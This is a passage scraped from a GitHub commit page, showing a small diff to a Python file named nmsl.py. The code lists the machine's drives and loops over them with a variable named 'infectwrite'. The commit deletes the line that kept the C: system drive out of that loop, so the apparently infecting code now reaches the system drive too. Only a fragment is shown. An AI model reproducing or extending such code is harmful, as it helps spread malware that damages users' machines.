We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 4a2e969 commit 9f8333bCopy full SHA for 9f8333b
nmsl.py
@@ -43,7 +43,6 @@ def go(self):
43
drivename = chr(drive) + ':\\'
44
if os.path.exists(drivename):
45
drives.append(drivename)
46
- drives.remove("C:\\")
47
try:
48
for infectwrite in drives:
49
0 commit comments